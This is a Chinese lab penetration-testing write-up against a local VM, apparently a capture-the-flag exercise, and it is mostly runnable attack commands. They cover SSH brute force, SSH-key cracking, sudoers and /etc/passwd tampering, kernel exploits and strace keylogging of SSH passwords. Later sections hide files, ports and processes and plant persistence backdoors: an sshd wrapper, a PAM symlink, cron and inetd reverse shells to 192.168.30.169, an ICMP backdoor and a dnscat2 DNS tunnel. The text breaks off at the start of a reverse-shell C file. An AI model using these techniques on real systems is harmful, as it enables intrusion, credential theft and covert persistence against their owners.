免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担
渗透测试
信息收集
nmap常扫描
快速主机发现
nmap -sn 192.168.30.0/24
确定目标IP
nmap -sV -p- --open 192.168.30.171
漏洞探测
先看22端口
nmap -sV -sC -p 22 192.168.30.171
九头蛇
ssh版本有历史漏洞
CVE-2018-15473 OpenSSH 7.7 及之前版本中存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。
CVE-2016-6210 OpenSSH 用户枚举漏洞。SSH 守护进程允许用户进行身份验证时的时间差进行用户枚举。
先用户名枚举
msfconsole -qx "use auxiliary/scanner/ssh/ssh_enumusers; set RHOSTS 192.168.30.171; set USER_FILE /home/kali/Desktop/top500.txt; exploit"
发现root用户,尝试弱口令
使用rockyou.txt
hydra -l root -P /home/kali/Desktop/rockyou.txt ssh://192.168.30.171
或者同时爆破用户和密码
hydra -L username.txt -P passwd.txt ssh://192.168.30.171
或者tscanplus
没爆出来,root可能不存在弱口令
空密码也不存在
看看139端口
nmap -p 139 --script smb-vuln-* 192.168.30.171
nmblookup -A 192.168.30.171
nmap -p 139 --script smb-vuln-ms08-067 192.168.30.171
enum4linux -a 192.168.30.171
可以发现
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Nov 19 04:10:09 2025
=========================================( Target Information )=========================================
Target ........... 192.168.30.171
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.30.171 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.30.171 )===============================
Looking up status of 192.168.30.171
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
==================================( Session Check on 192.168.30.171 )==================================
[+] Server 192.168.30.171 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.30.171 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.30.171 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.30.171 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
======================================( Users on 192.168.30.171 )======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
================================( Share Enumeration on 192.168.30.171 )================================
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
[+] Attempting to map shares on 192.168.30.171
//192.168.30.171/Anonymous Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.30.171/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.30.171 )===========================
[+] Attaching to 192.168.30.171 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.30.171 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.30.171 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
==============================( Getting printer info for 192.168.30.171 )==============================
No printers returned.
试着连接
smbclient //192.168.30.171/Anonymous -N
smbclient //192.168.30.171/Anonymous -U Jan
可以空密码进入,但没什么用
msf漏洞利用
msfconsole -qx "use exploit/linux/samba/is_known_pipename;set RHOST 192.168.30.171;set SMB_SHARE Anonymous;run"
发现都失败了,只找到staff.txt文件
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
这两个用户是存在的
445端口
nmap --script smb* -p 445 192.168.30.171
8009/8080端口
工具:Ghostcat-CNVD-2020-10487
python ajpShooter.py http://192.168.30.171:8080/ 8009 /WEB-INF/web.xml read
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to Tomcat
</description>
</web-app>
但是读取别的文件都失败了
失败
python ajpShooter.py http://192.168.30.171:8080/ 8009 /WEB-INF/classes/test.class read -o a.txt
python ajpShooter.py http://192.168.30.171:18080/demo 8009 /a.txt eval
CVE-2025-24813
put方法被禁了,算了
80端口
dirsearch目录扫描
dirsearch -u http://192.168.30.171/
扫出一个,查看
for J: ...and I was able to crack your hash really easily...
只有密码简单,解密才简单
SSH突破
既然发现了kay和jan,而jan有弱口令,爆破此用户
使用rockyou.txt
gunzip /usr/share/wordlists/rockyou.txt.gz
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.30.171 -t 64
[22][ssh] host: 192.168.30.171 login: jan password: armando
连接jan
ssh jan@192.168.30.171
连接成功,关闭历史命令功能
HISTFILE=/dev/null HISTSIZE=0 HISTFILESIZE=0; set +o history; history -c
尝试提权
没有权限,查看谁有sudo权限
cat /etc/group
kay有sudo权限,想办法登录kay
查看文件
ls -la /home/kay
查看kay的pass.bak文件
cat pass.bak
没有权限,那看看.ssh里的文件
cd .ssh
ls -la
我们发现了用户kay的.ssh目录,其中包含authorized_keys、id_rsa(私钥)和id_rsa.pub(公钥),并且均有读取权限
复制id_rsa文件到本地
scp jan@192.168.30.171:/home/kay/.ssh/id_rsa .
尝试使用私钥直接登录
#修改密钥文件权限
chmod 600 id_rsa
#使用私钥连接
ssh -i id_rsa kay@192.168.30.171
加密了,解密
解密
使用ssh2john + John the Ripper
# 将SSH私钥转换为John可破解的格式
ssh2john idr_sa > key.hash
# 使用John破解
john --wordlist=rockyou.txt key.hash
# 查看破解出的密码
john --show key.hash
ssh -i key kay@192.168.30.171
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
确认是kay的密码
hashcat
hashcat key rockyou.txt
对比发现第一个方法更快
信息收集
提权之信息收集
查看可登录的用户
grep -E '/(bash|sh|zsh|csh|tcsh|ksh)$' /etc/passwd
查看所有的超级用户
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
拥有sudo权限的用户
cat /etc/group
查看passwd、shadow权限
ls -la /etc/passwd /etc/shadow
-rw-r--r-- 1 root root 1639 Apr 23 2018 /etc/passwd
-rw-r----- 1 root shadow 1182 Dec 3 03:43 /etc/shadow
/etc/passwd所有用户可读,/etc/shadow的shadow用户组可读
查看发行版本
cat /etc/*-release
查看内核版本
uname -a
寻找对应版本的exp提权
查找敏感文件,可以根据开放的端口和可登录的用户判定
find / -type f -name "*.bash_history" -o -name "*config*" -o -name "web.xml" -o -name "*database*" -o -name "*pass*" 2>/dev/null
寻找suid文件,并且所属用户或组为root
执行suid文件时,进程获得的是文件所有者的权限
find / -type f -user root -perm -4000 -exec ls -la {} \; 2>/dev/null
find / -type f -user root -perm -4000 -exec ls -la {} + 2>/dev/null
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 Nov 30 2017 /bin/mount
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 27608 Nov 30 2017 /bin/umount
-rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 2437320 Nov 24 2016 /usr/bin/vim.basic
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Jan 18 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 85832 Nov 30 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
危险的suid文件,任何编程语言编译器、解释器和编辑器
find nano vim more/less man cp mv awk sed curl wget cat nmap perl ruby gdb python
寻找sgid文件
进程获得的是文件所属组的权限
find / -type f -group root -perm -2000 -exec ls -la {} + 2>/dev/null
-rwsr-sr-x 1 root root 85832 Nov 30 2017 /usr/lib/snapd/snap-confine
常规信息收集
查看端口开放情况
netstat -antup
可以发现有一个不对外开放的8005端口处于监听状态,可以对tomcat服务进行关闭
也可以使用这个命令
ss -antup
首先将8005端口转发至linux8888端口
ssh -L 0.0.0.0:8888:127.0.0.1:8005 jan@192.168.30.172 -N -f
连接Linux8888端口执行SHUTDOWN命令关闭tomcat服务
talnet 127.0.0.1 8888
查看同一网段的机器
cat > /tmp/ps.sh << 'EOF' && chmod +x /tmp/ps.sh && /tmp/ps.sh
for i in {1..254}; do ping -c1 -W1 192.168.30.$i 2>/dev/null | grep "bytes from" & done; wait; echo "完成"
rm -f "$0"
EOF
echo 'for i in {1..254}; do ping -c1 -W1 192.168.30.$i 2>/dev/null | grep "bytes from" & done; wait; echo "完成"' > /tmp/scan.sh && chmod +x /tmp/scan.sh && /tmp/scan.sh && rm /tmp/scan.sh
arp -a
备份文件
find /etc /opt /root /home /tmp /srv /var /proc -readable -type f \( -name *.bak -o -name *.gz -o -name *.zip -o -name *.tar -o -name *.tar.* -o -name *.rar -o -name *.sql \) -exec ls -la {} + 2>/dev/null
find /etc /opt /root /home /tmp /srv /var /proc -readable -regex ".*\.\(bak\|gz\|zip\|tar\|tar\..*\)$" -exec ls -la {} + 2>/dev/null
数据库文件
find /etc /opt /root /home /tmp /srv /var /proc -readable -type f \( -name "*.sql" -o -name "*.dump" -o -name "*.db" -o -name "*.mdb" -o -name "*.mdf" -o -name "*.ndf" -o -name "*.ldf" \) -exec ls -la {} + 2>/dev/null
ssh
find /root /home -type f -readable \( -name *id_ed* -o -name *id_rsa* -o -name *id_dsa* -o -name *known_hosts* \) -exec ls -la {} + 2>/dev/null
配置文件
find /etc /opt /root /home /tmp /srv /var /proc -type f \( -name "*.conf" -o -name "*.cfg" -o -name "*.ini" -o -name "*.yml" -o -name "*.yaml" -o -name "*.toml" -o -name "*.cnf" -o -name "*.json" -o -name "*.xml" -o -name *config \) -exec ls -la {} + 2>/dev/null
用户历史记录
find /root /home -type f -name *.bash_history -exec ls -la {} + 2>/dev/null
防火墙规则
iptables -L -n
提权
sudo
检查是否能提权
sudo -l
kay拥有完整的sudo权限
sudo su
现在是root用户了
ls /root或ls ~
vim修改文件提权
发现**/usr/bin/vim.basic**,可以通过这个执行命令
/usr/bin/vim.basic -c ':!/bin/sh'
这个并没有提权成功
/etc/sudoers
添加
vim -Es /etc/sudoers -c '$put =\"jan ALL=(ALL:ALL) NOPASSWD: ALL\"' -c 'wq!'
jan ALL=(ALL:ALL) NOPASSWD: ALL
尝试提权
sudo -i
cat /etc/sudoers | grep 'jan'
注释或删除
vim -Es /etc/sudoers -c '%s/^jan\s*ALL=(ALL:ALL) NOPASSWD: ALL/# &/' -c 'wq!'
vim -Es /etc/sudoers -c 'g/^jan\s*ALL=(ALL:ALL) NOPASSWD: ALL/d' -c 'wq!'
/etc/passwd
生成SHA-512密文
openssl passwd -6 123456
$6$ZgXacSBCs5HE7DwU$zDFoTJ33vYJEhmhFjs2wQ2JAHCU1oe/ptommxhf344TQb1o8WukHgk8h5aYbNhO/oarlQQ1Q6dzsJtwM8TDDo.
直接将root中的"x"换成密文
vim -Es -c '%s/^root:\zs[^:]*\ze:/$6$ZgXacSBCs5HE7DwU$zDFoTJ33vYJEhmhFjs2wQ2JAHCU1oe/ptommxhf344TQb1o8WukHgk8h5aYbNhO/oarlQQ1Q6dzsJtwM8TDDo./' -c 'wq!' /etc/passwd
vim -Es -c '%s/^root:\zs[^:]*\ze:/x/' -c 'wq!' /etc/passwd
或者添加一个hack用户
vim -Es -c '$put =\"hack:$6$ZgXacSBCs5HE7DwU$zDFoTJ33vYJEhmhFjs2wQ2JAHCU1oe/ptommxhf344TQb1o8WukHgk8h5aYbNhO/oarlQQ1Q6dzsJtwM8TDDo.:0:0:root:/root:/bin/bash\"' -c 'wq!' /etc/passwd
su hack
提权后将其删除
vim -Es -c 'g/^hack:.*/d' -c 'wq!' /etc/passwd
/etc/crontab
vim -Es /etc/crontab -c '$put =\"* * * * * root chmod +s /bin/bash\"' -c 'wq!'
即在末尾添加
* * * * * root chmod +s /bin/bash
一分钟后添加s权限,然后查看权限
ls -l /bin/bash
发现添加上s权限后,执行
/bin/bash -p
这个的根目录还是jan
cd /root
cat flag.txt
/etc/shadow
修改为空只能本地提权,但是往里面添加密码hash即可
openssl passwd -6 jan
$6$W35moC99uXqmJ65H$JzEeUW4zq59NA6Uaa4R5FvFGJ1UVVmD4i8ZfUR85YHhie3u9a2WWtKX7eeTVXb4oCUdbn2hCUsFXqHFCPvNTq.
vim -Es -c '%s/^root:\zs[^:]*\ze:/$6$W35moC99uXqmJ65H$JzEeUW4zq59NA6Uaa4R5FvFGJ1UVVmD4i8ZfUR85YHhie3u9a2WWtKX7eeTVXb4oCUdbn2hCUsFXqHFCPvNTq./' -c 'wq!' /etc/shadow
如果在/etc/passwd里添加了密码,那么系统依旧认为/etc/passwd里的密码有效,在/etc/shadow里做的修改是无效的
最终都是为了登录root,如果能访问,拿去解密也行
显示vim内容
vim -Es +%p +q! /etc/shadow | grep 'root'
内核提权
脚本
https://github.com/liamg/traitor
https://github.com/The-Z-Labs/linux-exploit-suggester
https://github.com/jondonas/linux-exploit-suggester-2
https://github.com/belane/linux-soft-exploit-suggester
https://github.com/carlospolop/PEASS-ng
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/redcode-labs/Bashark
https://github.com/rebootuser/LinEnum
下面将使用第二个提权
尽量不要尝试,内核可能直接崩溃
linux-exploit-suggester用于检查环境存在的提权条件
上传并执行
scp linux-exploit-suggester/linux-exploit-suggester.sh jan@192.168.30.171:/tmp
执行脚本
cd /tmp
./linux-exploit-suggester.sh
CVE-2017-16995
优先查看显示棕色字体的漏洞,因为可能性高才会显示
下载
# wget 方式
wget --content-disposition https://www.exploit-db.com/download/45010
# curl 方式
curl -OJ https://www.exploit-db.com/download/45010
静态编译
gcc -pthread -static 45010.c -o 45010
上传到目标机器
scp 45010 jan@192.168.30.171:/tmp
执行
./45010
失败
脏牛
下载
curl -OJ https://www.exploit-db.com/download/40611
编译
gcc -pthread -static 40611.c -o 40611
传到docker里编译,docker_id 为 79ce8d29d866
docker cp 40611.c 79ce8d29d866:/workspace
gcc -pthread 40611.c -o dirty -lcrypt
生成hash
openssl passwd -1 hack
$1$0.atYTn2$/7p3dNtGkXAJ./auK2z5.0
上传脚本
scp 40611 jan@192.168.30.171:/tmp
在目标主机执行脚本
./40611 /etc/passwd "hack:$1$0.atYTn2$/7p3dNtGkXAJ./auK2z5.0:0:0:root:/root:/bin/bash"
失败
脏牛2
curl -OJ https://www.exploit-db.com/download/40839
docker里编译
gcc -pthread 40839.c -o 40839 -lcrypt
上传并执行
scp 40839 jan@192.168.30.172:/tmp
./40839
输入密码12345
su firefart
这个也失效了
PwnKit
CVE-2021-4034
curl -OJ https://codeload.github.com/berdav/CVE-2021-4034/zip/main
unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main
拉取docker镜像
渡渡鸟docker镜像同步站:docker.aityp.com/
先查看发行版本
cat /etc/*-release
根据前面的x86_x64架构选择amd64
拉取镜像并运行
docker pull swr.cn-north-4.myhuaweicloud.com/ddn-k8s/docker.io/ubuntu:16.04 \
docker run -itd --restart=always \
-v /home/kali/uppower/exp/CVE-2021-4034-main/CVE-2021-4034-main:/workspace \
--name ubuntu \
swr.cn-north-4.myhuaweicloud.com/ddn-k8s/docker.io/ubuntu:16.04 \
/bin/bash
在容器内执行命令
apt update && apt install -y gcc
apt-get install make
确保有文件
make
删除多余文件
rm -r cve-2021-4034.* pwnkit.c README.md dry-run Makefile LICENSE
在kali上将文件上传
scp -r CVE-2021-4034-main jan@192.168.30.171:/tmp
在目标主机上运行
cd CVE-2021-4034-main
./cve-2021-4034
防御措施:打补丁
CVE-2021-3156
先检查有没有sudo权限
sudo -l
没有,那就测不了
CVE-2017-7308
curl -OJ https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
docker里编译
gcc -o poc poc.c
执行
./poc
失败
CVE-2017-6074
curl -OJ https://www.exploit-db.com/download/41458
gcc -o 41458 41458.c
./41458
如果长时间没反应,注意提示,不要中断,否则内核会崩溃
..............................................
CVE-2017-1000112
curl -OJ https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
gcc -o poc poc.c
这个漏洞需要内核版本在4.11-4.11.5,根据uname -a得出版本过低了
CVE-2016-8655
curl -OJ https://www.exploit-db.com/download/40871
gcc 40871.c -o 40871 -pthread
下次一定
CVE-2016-4557
curl -OJ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
apt install pkg-config libfuse-dev fuse
执行编译脚本
./compile.sh
上传
scp -r ebpf_mapfd_doubleput_exploit jan@192.168.30.172:/tmp
执行
cd ebpf_mapfd_doubleput_exploit
./doubleput
最终,只有PwnKit成功了,所以优先考虑可能性高且离目标版本发布时间久的提权漏洞
内网横向
前面的找敏感信息也是一部分以及破解/etc/shadow里的密码
监听本地发起连接的ssh流量
vim -Es ~/.bashrc -c "norm G" -c "norm oalias ssh='strace -o /tmp/.sshpwd-\`date '+%d%h%m%s'\`.log -e read,write,connect -s2048 ssh'" -c "wq!"
或者
echo "alias ssh='strace -o /tmp/.sshpwd-\`date '+%d%h%m%s'\`.log -e read,write,connect -s2048 ssh'" >/tmp/toor;vim -Es -c '$r /tmp/toor' -c 'wq!' ~/.bashrc;rm /tmp/toor
激活新添加的
source ~/.bashrc
目标发起ssh连接后的流量会被记录
只输出想要的结果
grep -E '^write\(4, "[^"]*password[^"]*".*=|^read\(4, "[[:alnum:]\\]*", 1\)|^write\(4, "\\\\n", 1\)' /tmp/.sshpwd-*.log
键盘记录提取
grep -E '^write\(4, "[^"]+@[^"]*'"'"'s password: ".*=|^read\(4, "."|^write\(4, "\\\\n"' /tmp/.sshpwd-*.log
删除操作,找到此行并删除
vim -Es ~/.bashrc -c 'g/alias ssh.*strace/d' -c 'wq!'
监听ssh外来流量
查看进程关系
在进程树中查找与 sshd 相关的进程,并显示每个匹配进程的上下文,前后各两行
pstree -ap | grep -A 2 -B 2 sshd
监听sshd主进程
strace -f -p 1148 -o /tmp/.ssh.log -e trace=read,write,connect -s 2048
提取密码
grep -oP '\\\\f\\\\0\\\\0\\\\0\\\\[0-9]{1,3}[a-zA-Z0-9_]+' /tmp/.ssh.log
键盘记录
awk '/write.*= 1$|write.*= 2$|write.*= 3$/ {print $0}' /tmp/.ssh.log
awk '/write.*= [123]$/ {match($0, /"([^"]+)"/, a); printf "%s", a[1]} END{print ""}' /tmp/.ssh.log
权限维持
隐藏文件
常规隐藏
mv test.txt .test.txt
setfattr -n "user.hidden" -v 1 .ssh.log
getfattr .ssh.log
创建参数混淆文件
当执行 rm -- 时,会误以为用户要执行rm --help等参数,即默认用户输入参数错误
echo "test" > --
甚至可以把文件命名为--help,-rf等rm参数
使用绝对路径或者相对路径即可删除,因为这时候rm不再理解./--为参数,而是文件
rm ./--
rm /tmp/--
将文件放入/tmp目录下的常驻文件,类似.font-unix、.ICE-unix等
隐藏文件时间戳
把index.php文件的时间赋给webshell.php
touch -r hsperfdata_tomcat9 ./--help
指定时间戳
touch -t 202512110810.20 ./ts -c
# -c 文件不存在的时候不会创建
但是
ls -la --full-time
这个命令显示出来的时间,一眼就能看出--help文件不正常
故应该使用-d更精确
touch -d "2025-12-10 06:24:39.067830158" ./--help -c
但终归有缺陷,stat能够显示最后的修改时间
stat ./--help
隐藏权限
锁定文件
chattr +i ./-rf
#解除
chattr -i ./-rf
设置目录为仅追加
mddir test
chattr +a test
#解除
chattr -a test
查看属性
lsattr ./-rf
隐藏历史操作前面已经提及,不再赘述
隐藏端口
使用iptables
目标机器
# 1. 创建端口复用链
iptables -t nat -N LETMEIN
# 端口复用规则
iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
# 开启开关,默认在filter表添加,不用指定表
iptables -A INPUT -p tcp --dport 81 -m recent --set --name letmein --rsource -j ACCEPT
# 关闭开关,同上
iptables -A INPUT -p tcp --dport 82 -m recent --name letmein --remove -j ACCEPT
# 主规则
iptables -t nat -A PREROUTING -p tcp --dport 80 -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
参数解释
append -A / delete -D / list -L / new -N / jump -j / match -m / table -t / protocol -p / destination port --dport / record source --rsource
发起的连接机器
开启
curl http://192.168.30.172:81
关闭
curl http://192.168.30.172:82
删除添加的规则
查看 nat 表的 PREROUTING 链并显示行号
iptables -t nat -L PREROUTING -n --line-numbers
查看 filter 表的 INPUT 链,不指定表,即没有-t,默认filter表
iptables -L INPUT -n --line-number
确认是添加的规则
删除 nat 表的 PREROUTING 链的第1个
iptables -t nat -D PREROUTING 1
删除 filter 表的 INPUT 链的第1、2个
# 删除掉第1个之后,第2个会变成第1个,故先删第二个
iptables -D INPUT 2
iptables -D INPUT 1
# 或执行两次下面的命令
iptables -D INPUT 1
清空并删除LETMEIN链
iptables -t nat -F LETMEIN
iptables -t nat -X LETMEIN
# delete-chain -X / flush -F
# 检查LETMEIN是否已清除
iptables -t nat -L LETMEIN -n --line-number
使用之前的查看命令查看是否已清除添加的规则
隐藏进程
CACM
wget https://github.com/RuoJi6/CACM/releases/download/CACM_v2.3.1/CACM_amd64_zh
...
chmod +x CACM
sudo ./CACM
ps aux
hide 124629
删除掉遗留的文件
rmdir .cacm_124629
应对方法:
由于挂的是空目录,所以硬链接一般为2( . 和 .. ),并且大小为40,权限也很可疑
ls -la /proc/ | grep \"2 root\"
解除隐藏进程,之前的我已经取消挂载了
umount /proc/119135
backdoor
ssh
允许PAM认证
grep -i "usepam" /etc/ssh/sshd_config
查看root能否密码登录
grep -in "root" /etc/ssh/sshd_config
改为允许
sed -i '28c\PermitRootLogin yes' /etc/ssh/sshd_config
查找可用软连接名称
find /etc/pam.d/sshd | xargs grep "pam_rootok"
sufficient:如果成功则立即通过认证
pam_rootok:检查调用进程的UID是否为0(root用户)
通过软连接建立
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8091
或者在发现不允许密码时
/tmp/su -oPort=8091 -oPermitRootLogin=yes
连接
ssh -p 8091 root@192.168.30.172
去除软连接后门
ps aux | grep "/tmp/su"
kill 382
rm -r /tmp/su
SSH Wrapper
目标
cd /usr/sbin
mv sshd ../bin
echo '#!/usr/bin/perl' > sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/sshd restart #或 systemctl restart sshd
攻击机
socat STDIO TCP4:192.168.30.172:22,sourceport=13377
SSH公钥登录
攻击机生成公私钥
ssh-keygen -t rsa
目标机器下载公钥
wget http://192.168.30.169/.ssh/id_rsa1.pub
添加公钥内容
cat id_rsa1.pub >> /root/.ssh/authorized_keys
赋予权限
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys
攻击机连接
SUID
普通用户登录提权到root
cp /bin/sh /tmp/.sb
chmod +s /tmp/.sb
/tmp/.sb -p
cron
与vim有suid修改/etc/crontab差不多,只不过有root权限,命令会简单很多
每分钟执行一次
echo "* * * * * root chmod +s /bin/bash" >> /etc/crontab
echo "bash -i >& /dev/tcp/192.168.30.169/8881 0>&1" > /root/t.sh
(printf "* * * * * /bin/bash /root/t.sh;\rno crontab for `whoami`%100c\n")|crontab -
监听
nc -lvvp 8881
intetd
apt-get install openbsd-inetd
echo "daytime stream tcp nowait root /bin/bash bash -i" > /tmp/t0;vim -Es -c '$r /tmp/t0' -c 'wq!' /etc/inetd.conf;rm /tmp/t0
#启动inetd
sudo inetd
daytime stream tcp nowait root /bin/bash bash -i
#daytime -服务
#stream tcp -tcp流
#nowait -不等待,给每个连接启动新进程
#root -以root身份运行
#/bin/bash -执行的程序路径
#bash -i -程序执行的命令,提供交互式shell
nc连接
daytime可以替换成任何服务或者端口
sed -i 's/daytime/13453/g' /etc/inetd.conf
sudo inetd
在/etc/services里添加服务
echo "wsdy 5678/tcp" >> /etc/services
sed -i 's/13453/wsdy/g' /etc/inetd.conf
sudo inetd
ICMP
git clone https://github.com/andreafabrizi/prism.git
apt-get install libc6-dev-amd64
gcc -DDETACH -m64 -Wall -s -o prism prism.c
chmod +x prism
目标运行
sudo ./prism
攻击机运行
./sendPacket.py 192.168.30.172 p4ssw0rd 192.168.30.169 7891 #如果不兼容,则在docker运行
nc -lvvp 7891
DNS
dnscat2
服务端
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
gem install bundler
bundle install
客户端
cd dnscat2/client/
make
服务端启动
ruby dnscat2.rb --no-cache --secret=12345
客户端连接
./dnscat --dns server=192.168.30.169,port=53 --secret=12345
进程注入
下载
git clone https://github.com/gaffe23/linux-inject.git
#编译
make
如果编译缺少库,docker安装完整的开发工具链
apt-get update
apt-get install build-essential
apt-get install libc6-dev
apt-get install gcc-multilib
这里让AI简单写了一个脚本
// reverse.c
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdlib.h>
